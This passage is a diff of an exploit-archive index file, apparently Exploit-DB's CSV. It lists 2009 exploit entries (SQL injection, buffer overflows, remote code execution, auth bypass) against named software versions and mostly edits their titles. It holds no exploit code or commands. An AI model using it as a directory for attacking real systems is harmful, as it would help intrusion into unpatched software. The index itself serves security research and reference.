4.2.0e (page) Remote Blind SQL Injection Exploit",2009-05-07,DNX,php,webapps,0 8623,platforms/windows/remote/8623.rb,"32bit FTP - (PASV) Reply Client Remote Overflow Exploit (Metasploit)",2009-05-07,His0k4,windows,remote,0 8624,platforms/windows/local/8624.pl,"Soritong MP3 Player 1.0 - Local Buffer Overflow Exploit (SEH)",2009-05-07,Stack,windows,local,0 8625,platforms/windows/dos/8625.pl,"Sorinara Streaming Audio Player 0.9 - (.PLA) Local Stack Overflow PoC",2009-05-07,GoLd_M,windows,dos,0 @@ -8149,32 +8149,32 @@ id,file,description,date,author,platform,type,port 8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - (Auth Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0 8644,platforms/windows/dos/8644.pl,"ViPlay3 <= 3.00 - (.vpl) Local Stack Overflow PoC",2009-05-08,LiquidWorm,windows,dos,0 8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable (Auth Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0 -8646,platforms/multiple/dos/8646.php,"Mortbay Jetty <= 7.0.0-pre5 Dispatcher Servlet Denial of Service Exploit",2009-05-08,ikki,multiple,dos,0 +8646,platforms/multiple/dos/8646.php,"Mortbay Jetty 7.0.0-pre5 Dispatcher Servlet Denial of Service Exploit",2009-05-08,ikki,multiple,dos,0 8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0 8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - (AlbumID) Blind SQL Injection Exploit",2009-05-08,YEnH4ckEr,php,webapps,0 -8649,platforms/php/webapps/8649.php,"TinyWebGallery <= 1.7.6 - LFI / Remote Code Execution Exploit",2009-05-08,EgiX,php,webapps,0 +8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - LFI / Remote Code Execution Exploit",2009-05-08,EgiX,php,webapps,0 8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - (ABORT) Remote DoS Exploit",2009-05-11,"Jonathan Salwan",windows,dos,0 8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure Exploit",2009-05-11,Cyber-Zone,windows,remote,0 -8652,platforms/php/webapps/8652.pl,"eggBlog <= 4.1.1 - Local Directory Transversal Exploit",2009-05-11,StAkeR,php,webapps,0 +8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Transversal Exploit",2009-05-11,StAkeR,php,webapps,0 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - (DT/Bypass/SU) Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0 -8654,platforms/php/webapps/8654.txt,"openWYSIWYG <= 1.4.7 - Local Directory Transversal",2009-05-11,StAkeR,php,webapps,0 +8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Transversal",2009-05-11,StAkeR,php,webapps,0 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Remote Blind SQL Injection Exploit",2009-05-11,YEnH4ckEr,php,webapps,0 8656,platforms/windows/local/8656.py,"MPLAB IDE 8.30 - (.mcp) Universal Seh Overwrite Exploit",2009-05-11,His0k4,windows,local,0 8657,platforms/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File",2009-05-11,Zigma,windows,local,0 -8658,platforms/php/webapps/8658.txt,"php recommend <= 1.3 - (ab/RFI/ci) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 -8659,platforms/php/webapps/8659.php,"Bitweaver <= 2.6 saveFeed() Remote Code Execution Exploit",2009-05-12,Nine:Situations:Group,php,webapps,0 +8658,platforms/php/webapps/8658.txt,"php recommend 1.3 - (ab/RFI/ci) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 +8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 saveFeed() Remote Code Execution Exploit",2009-05-12,Nine:Situations:Group,php,webapps,0 8660,platforms/windows/local/8660.pl,"CastRipper 2.50.70 - (.m3u) Local Buffer Overflow Exploit",2009-05-12,[0]x80->[H]4x²0r,windows,local,0 8661,platforms/windows/local/8661.pl,"CastRipper 2.50.70 - (.m3u) Universal Stack Overflow Exploit",2009-05-12,Stack,windows,local,0 8662,platforms/windows/local/8662.py,"CastRipper 2.50.70 - (.m3u) Universal Stack Overflow Exploit (Python)",2009-05-12,"Super Cristal",windows,local,0 8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - (.pls) Universal Stack Overflow Exploit",2009-05-12,zAx,windows,local,0 -8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 - (username) Remote SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0 +8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 - (username) SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0 8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0 8670,platforms/windows/local/8670.php,"Pinnacle Studio 12 - (.hfz) Directory Traversal",2009-05-13,Nine:Situations:Group,windows,local,0 -8671,platforms/php/webapps/8671.pl,"Family Connections CMS <= 1.9 - (member) SQL Injection Exploit",2009-05-13,YEnH4ckEr,php,webapps,0 +8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - (member) SQL Injection Exploit",2009-05-13,YEnH4ckEr,php,webapps,0 8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0 8673,platforms/linux/local/8673.c,"Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - ptrace_attach Local Privilege Escalation Exploit",2009-05-13,s0m3b0dy,linux,local,0 8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Auth Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0 @@ -8182,7 +8182,7 @@ id,file,description,date,author,platform,type,port 8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - (Auth Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0 8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - (.m3u / .m3l files) Buffer Overflow PoCs",2009-05-14,SirGod,windows,dos,0 8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit",2009-05-14,prdelka,linux,local,0 -8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple Remote SQL Injection Vulnerabilities",2009-05-14,YEnH4ckEr,php,webapps,0 +8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injection Vulnerabilities",2009-05-14,YEnH4ckEr,php,webapps,0 8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 (arch.php arch) - Local File Inclusion",2009-05-14,Kacper,php,webapps,0 8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 - LFI / Remote Command Execution Exploit",2009-05-14,[AVT],php,webapps,0 8682,platforms/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0 @@ -8202,46 +8202,46 @@ id,file,description,date,author,platform,type,port 8697,platforms/php/webapps/8697.txt,"Joomla Component ArtForms 2.1 b7 - Remote File Inclusion Vulnerabilities",2009-05-15,iskorpitx,php,webapps,0 8698,platforms/windows/local/8698.pl,"Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit",2009-05-15,hack4love,windows,local,0 8699,platforms/php/webapps/8699.php,"Harland Scripts 11 Products Remote Command Execution Exploit",2009-05-15,G4N0K,php,webapps,0 -8700,platforms/php/webapps/8700.txt,"Rama CMS <= 0.9.8 - (download.php) File Disclosure",2009-05-15,Br0ly,php,webapps,0 +8700,platforms/php/webapps/8700.txt,"Rama CMS 0.9.8 - (download.php) File Disclosure",2009-05-15,Br0ly,php,webapps,0 8701,platforms/windows/local/8701.py,"Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)",2009-05-15,His0k4,windows,local,0 8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL/XSS) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 8704,platforms/windows/remote/8704.txt,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass",2009-05-15,kingcope,windows,remote,0 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 -8706,platforms/php/webapps/8706.pl,"PHPenpals <= 1.1 - (mail.php ID) Remote SQL Injection Exploit",2009-05-15,Br0ly,php,webapps,0 +8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - (mail.php ID) SQL Injection Exploit",2009-05-15,Br0ly,php,webapps,0 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - (ab/XSS/SQL) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - (ab/SQL/XSS) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Remote Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0 8710,platforms/php/webapps/8710.txt,"PHP Dir Submit (Auth Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0 -8711,platforms/php/webapps/8711.txt,"Online Rental Property Script <= 5.0 - (pid) SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 -8712,platforms/windows/dos/8712.txt,"httpdx <= 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0 -8713,platforms/php/webapps/8713.txt,"coppermine photo gallery <= 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 +8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - (pid) SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 +8712,platforms/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0 +8713,platforms/php/webapps/8713.txt,"coppermine photo gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Remote LFI / Change Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0 8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 - (langpref) Local File Inclusion Vulnerabilities",2009-05-18,ahmadbady,php,webapps,0 -8716,platforms/windows/remote/8716.py,"httpdx <= 0.5b FTP Server (USER) Remote BoF Exploit (SEH)",2009-05-18,His0k4,windows,remote,21 +8716,platforms/windows/remote/8716.py,"httpdx 0.5b FTP Server (USER) Remote BoF Exploit (SEH)",2009-05-18,His0k4,windows,remote,21 8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0 -8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 +8718,platforms/php/webapps/8718.txt,"douran portal 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0 -8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0 +8720,platforms/multiple/dos/8720.c,"OpenSSL 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0 8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0 8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0 -8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 - (id) Remote SQL Injection",2009-05-18,Mi4night,php,webapps,0 -8725,platforms/php/webapps/8725.php,"Jieqi CMS <= 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0 -8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - (inc/ajax.asp) Remote SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 -8727,platforms/php/webapps/8727.txt,"DGNews 3.0 Beta (id) Remote SQL Injection",2009-05-18,Cyber-Zone,php,webapps,0 +8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 - (id) SQL Injection",2009-05-18,Mi4night,php,webapps,0 +8725,platforms/php/webapps/8725.php,"Jieqi CMS 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0 +8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - (inc/ajax.asp) SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 +8727,platforms/php/webapps/8727.txt,"DGNews 3.0 Beta (id) SQL Injection",2009-05-18,Cyber-Zone,php,webapps,0 8728,platforms/php/webapps/8728.htm,"PHP Article Publisher Remote Change Admin Password Exploit",2009-05-18,ahmadbady,php,webapps,0 8730,platforms/php/webapps/8730.txt,"VidShare Pro Arbitrary Shell Upload",2009-05-19,InjEctOr5,php,webapps,0 8731,platforms/php/webapps/8731.php,"Joomla com_gsticketsystem (catid) Blind SQL Injection Exploit",2009-05-19,InjEctOr5,php,webapps,0 -8732,platforms/windows/remote/8732.py,"httpdx <= 0.5b FTP Server (CWD) Remote BoF Exploit (SEH)",2009-05-19,His0k4,windows,remote,21 +8732,platforms/windows/remote/8732.py,"httpdx 0.5b FTP Server (CWD) Remote BoF Exploit (SEH)",2009-05-19,His0k4,windows,remote,21 8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() - Remote BoF Exploit",2009-05-19,rgod,windows,remote,0 8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure",2009-05-19,Securitylab.ir,asp,webapps,0 8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,php,webapps,0 -8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery <= 1.4.22 - Remote Exploit",2009-05-19,girex,php,webapps,0 +8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery 1.4.22 - Remote Exploit",2009-05-19,girex,php,webapps,0 8737,platforms/php/webapps/8737.txt,"vidshare pro - (SQL/XSS) Multiple Vulnerabilities",2009-05-19,snakespc,php,webapps,0 8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injection Vulnerabilities",2009-05-19,YEnH4ckEr,php,webapps,0 8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,php,webapps,0 8740,platforms/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b - BlindSQL Injection Exploit",2009-05-19,YEnH4ckEr,php,webapps,0 8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - (Auth Bypass) SQL Injection",2009-05-19,snakespc,php,webapps,0 -8742,platforms/windows/remote/8742.txt,"KingSoft Web Shield <= 1.1.0.62 - XSS/Code Execution",2009-05-19,inking,windows,remote,0 +8742,platforms/windows/remote/8742.txt,"KingSoft Web Shield 1.1.0.62 - XSS/Code Execution",2009-05-19,inking,windows,remote,0 8743,platforms/php/webapps/8743.txt,"Joomla Casino 0.3.1 - Multiple SQL Injection Exploits",2009-05-20,ByALBAYX,php,webapps,0 8744,platforms/php/webapps/8744.txt,"exjune officer message system 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 8745,platforms/php/webapps/8745.txt,"catviz 0.4.0b1 - (LFI/XSS) Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0 @@ -8258,18 +8258,18 @@ id,file,description,date,author,platform,type,port 8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 8757,platforms/windows/remote/8757.html,"BaoFeng (config.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 8758,platforms/windows/remote/8758.html,"ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 -8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple Remote SQL Injection Vulnerabilities",2009-05-21,YEnH4ckEr,php,webapps,0 +8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injection Vulnerabilities",2009-05-21,YEnH4ckEr,php,webapps,0 8761,platforms/php/webapps/8761.txt,"Article Directory (Auth Bypass) SQL Injection",2009-05-21,Hakxer,php,webapps,0 8762,platforms/php/webapps/8762.txt,"Article Directory (page.php) Remote Blind SQL Injection",2009-05-21,"ThE g0bL!N",php,webapps,0 8763,platforms/php/webapps/8763.txt,"ZaoCMS Insecure Cookie Handling",2009-05-21,"ThE g0bL!N",php,webapps,0 8764,platforms/php/webapps/8764.txt,"ZaoCMS (download.php) Remote File Disclosure",2009-05-21,"ThE g0bL!N",php,webapps,0 8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0 -8766,platforms/php/webapps/8766.txt,"Tutorial Share <= 3.5.0 Insecure Cookie Handling",2009-05-22,Evil-Cod3r,php,webapps,0 +8766,platforms/php/webapps/8766.txt,"Tutorial Share 3.5.0 Insecure Cookie Handling",2009-05-22,Evil-Cod3r,php,webapps,0 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0 -8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) Remote SQL Injection",2009-05-22,Qabandi,php,webapps,0 -8770,platforms/windows/local/8770.py,"Winamp <= 5.55 - (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0 +8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) SQL Injection",2009-05-22,Qabandi,php,webapps,0 +8770,platforms/windows/local/8770.py,"Winamp 5.55 - (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0 8771,platforms/php/webapps/8771.htm,"ZaoCMS - (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0 -8772,platforms/windows/local/8772.pl,"Winamp <= 5.55 - (MAKI script) Universal Integer Overflow Exploit",2009-05-22,"Encrypt3d.M!nd ",windows,local,0 +8772,platforms/windows/local/8772.pl,"Winamp 5.55 - (MAKI script) Universal Integer Overflow Exploit",2009-05-22,"Encrypt3d.M!nd ",windows,local,0 8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) - Arbitrary Remote File Upload",2009-05-22,Qabandi,php,webapps,0 8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0 8775,platforms/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 - Change Admin Pass",2009-05-22,G4N0K,php,webapps,0 @@ -8281,10 +8281,10 @@ id,file,description,date,author,platform,type,port 8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,php,webapps,0 8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - (ps_drv.sys) Local Privilege Escalation Exploit",2009-05-26,"NT Internals",windows,local,0 8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0 -8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza <= 2.x - (vbplaza.php) Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0 +8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - (vbplaza.php) Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0 8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0 8786,platforms/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,multiple,remote,0 -8787,platforms/php/webapps/8787.txt,"MyFirstCMS <= 1.0.2 - Remote Arbitrary File Delete",2009-05-26,darkjoker,php,webapps,0 +8787,platforms/php/webapps/8787.txt,"MyFirstCMS 1.0.2 - Remote Arbitrary File Delete",2009-05-26,darkjoker,php,webapps,0 8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script (profile.php user_id) SQL Injection",2009-05-26,Qabandi,php,webapps,0 8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow Exploit (SEH)",2009-05-26,SuNHouSe2,windows,local,0 8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion Exploit",2009-05-26,StAkeR,php,webapps,0 @@ -8296,46 +8296,46 @@ id,file,description,date,author,platform,type,port 8796,platforms/php/webapps/8796.htm,"Gallarific (user.php) Arbirary Change Admin Information Exploit",2009-05-26,TiGeR-Dz,php,webapps,0 8797,platforms/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 8798,platforms/windows/dos/8798.rb,"Safari RSS feed:// Buffer Overflow via libxml2 Exploit PoC",2009-05-26,"Kevin Finisterre",windows,dos,0 -8799,platforms/windows/local/8799.txt,"PHP <= 5.2.9 - Local Safemod Bypass Exploit (Win32)",2009-05-26,Abysssec,windows,local,0 +8799,platforms/windows/local/8799.txt,"PHP 5.2.9 - Local Safemod Bypass Exploit (Win32)",2009-05-26,Abysssec,windows,local,0 8801,platforms/php/webapps/8801.txt,"Joomla Component com_rsgallery2 1.14.x/2.x - Remote Backdoor",2009-05-26,"Jan Van Niekerk",php,webapps,0 -8802,platforms/php/webapps/8802.txt,"Kensei Board <= 2.0.0b - Multiple SQL Injection Vulnerabilities",2009-05-26,cOndemned,php,webapps,0 -8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - (Auth Bypass) Remote SQL Injection",2009-05-26,"ThE g0bL!N",php,webapps,0 +8802,platforms/php/webapps/8802.txt,"Kensei Board 2.0.0b - Multiple SQL Injection Vulnerabilities",2009-05-26,cOndemned,php,webapps,0 +8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - (Auth Bypass) SQL Injection",2009-05-26,"ThE g0bL!N",php,webapps,0 8804,platforms/windows/remote/8804.py,"Soulseek 157 NS Remote Buffer Overflow Exploit (SEH)",2009-05-26,His0k4,windows,remote,2242 8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0 8806,platforms/windows/remote/8806.pl,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Perl)",2009-05-26,ka0x,windows,remote,0 8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addadminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - (Auth Bypass) SQL Injection",2009-05-26,ByALBAYX,php,webapps,0 8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - (addadminmembercode.php) Add Admin Exploit",2009-05-26,x.CJP.x,php,webapps,0 -8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) Remote SQL Injection",2009-05-26,KIM,php,webapps,0 +8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) SQL Injection",2009-05-26,KIM,php,webapps,0 8811,platforms/php/webapps/8811.txt,"Joomla Component Com_Agora 3.0.0 RC1 - Remote File Upload",2009-05-26,ByALBAYX,php,webapps,0 8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion Exploit",2009-05-26,Nine:Situations:Group,php,webapps,0 8813,platforms/php/webapps/8813.txt,"Million Dollar Text Links 1.x Insecure Cookie Handling",2009-05-27,HxH,php,webapps,0 8814,platforms/php/webapps/8814.txt,"Joomla Component AgoraGroup 0.3.5.3 - Blind SQL Injection",2009-05-27,"Chip d3 bi0s",php,webapps,0 8815,platforms/php/webapps/8815.txt,"Easy Px 41 CMS 09.00.00B1 - (fiche) Local File Inclusion",2009-05-27,"ThE g0bL!N",php,webapps,0 -8816,platforms/php/webapps/8816.txt,"SiteX <= 0.7.4.418 - (THEME_FOLDER) Local File Inclusion Vulnerabilities",2009-05-27,ahmadbady,php,webapps,0 -8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 - (cat_id) Remote SQL Injection",2009-05-27,taRentReXx,php,webapps,0 +8816,platforms/php/webapps/8816.txt,"SiteX 0.7.4.418 - (THEME_FOLDER) Local File Inclusion Vulnerabilities",2009-05-27,ahmadbady,php,webapps,0 +8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 - (cat_id) SQL Injection",2009-05-27,taRentReXx,php,webapps,0 8818,platforms/php/webapps/8818.txt,"AdPeeps 8.5d1 - XSS and HTML Injection Vulnerabilities",2009-05-27,intern0t,php,webapps,0 8819,platforms/php/webapps/8819.txt,"small pirate 2.1 - (XSS/SQL) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0 8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (XSS/SQL/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0 8821,platforms/php/webapps/8821.txt,"Joomla Component JVideo 0.3.x SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service Exploit",2009-05-29,"Thierry Zoller",multiple,dos,0 -8823,platforms/php/webapps/8823.txt,"Webboard <= 2.90 beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0 +8823,platforms/php/webapps/8823.txt,"Webboard 2.90 beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0 8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 - (SonicMediaPlayer.dll) Remote BoF Exploit",2009-05-29,snakespc,windows,remote,0 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Auth Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0 -8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat <= 9.1.1 - Stack Overflow Crash PoC (osx/win)",2009-05-29,"Saint Patrick",multiple,dos,0 +8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 - Stack Overflow Crash PoC (osx/win)",2009-05-29,"Saint Patrick",multiple,dos,0 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0 -8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Auth Bypass) Remote SQL Injection",2009-05-29,"sniper code",php,webapps,0 -8829,platforms/php/webapps/8829.txt,"ZeusCart <= 2.3 - (maincatid) SQL Injection",2009-05-29,Br0ly,php,webapps,0 -8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links <= 1.0 - (id) SQL Injection",2009-05-29,Qabandi,php,webapps,0 +8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Auth Bypass) SQL Injection",2009-05-29,"sniper code",php,webapps,0 +8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - (maincatid) SQL Injection",2009-05-29,Br0ly,php,webapps,0 +8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - (id) SQL Injection",2009-05-29,Qabandi,php,webapps,0 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Auth Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0 8832,platforms/windows/dos/8832.php,"ICQ 6.5 URL Search Hook (Windows Explorer) Remote BoF PoC",2009-06-01,Nine:Situations:Group,windows,dos,0 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 Web Management Console Arbitrary Command Exec",2009-06-01,Securitum,hardware,local,0 -8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) Remote SQL Injection Exploit",2009-06-01,Br0ly,php,webapps,0 +8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection Exploit",2009-06-01,Br0ly,php,webapps,0 8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 - (IAManager.dll) Remote BoF Exploit (heap spray)",2009-06-01,His0k4,windows,remote,0 